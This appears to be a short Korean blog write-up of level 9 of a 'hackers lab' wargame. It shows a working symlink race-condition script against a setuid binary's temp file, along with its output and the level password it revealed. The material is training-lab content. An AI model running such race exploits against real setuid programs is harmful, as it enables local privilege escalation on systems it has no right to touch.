hackers lab level 9

Tags:

이번부터는 해킹기법에 대한 이해가 필요하다. 한때 유명했던 8lgm 이 즐겨 발표했던 방법으로써 /usr/bin/ps2 를 이용하여 다음 레벨을 획득하여라. 힌트를 주자면 임시파일이 /var/tmp2 에 생성된다.

——-

[level8@drill /]$ find / -perm +4000 -user level9 -ls 2> /dev/null
672308 16 -rws–x— 1 level9 level8 15739 Jul 5 2001 /usr/bin/ps2

[level8@drill /]$ /usr/bin/ps2
[level8@drill /]$ find /var/tmp2 -user level9

ps2는 쓰고 바로 지우는군요.

[level8@drill tmp2]$ cat race
while true
do
/usr/bin/ps2 &
rm -f /var/tmp2/ps2.tmp
ln -sf /bin/pass /var/tmp2/ps2.tmp
done

[level8@drill tmp2]$ ./race
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
file is symbolic link
ln: cannot remove `/var/tmp2/ps2.tmp’: Operation not permitted
file exist
file is symbolic link
rm: cannot unlink `/var/tmp2/ps2.tmp’: Operation not permitted
Congratulations !!! your race attack success ~
level9 Password is !secu!

솔직히 문제 자체가 좀 말이 안되는감이 있음…

Comments

Leave a Reply

Your email address will not be published. Required fields are marked *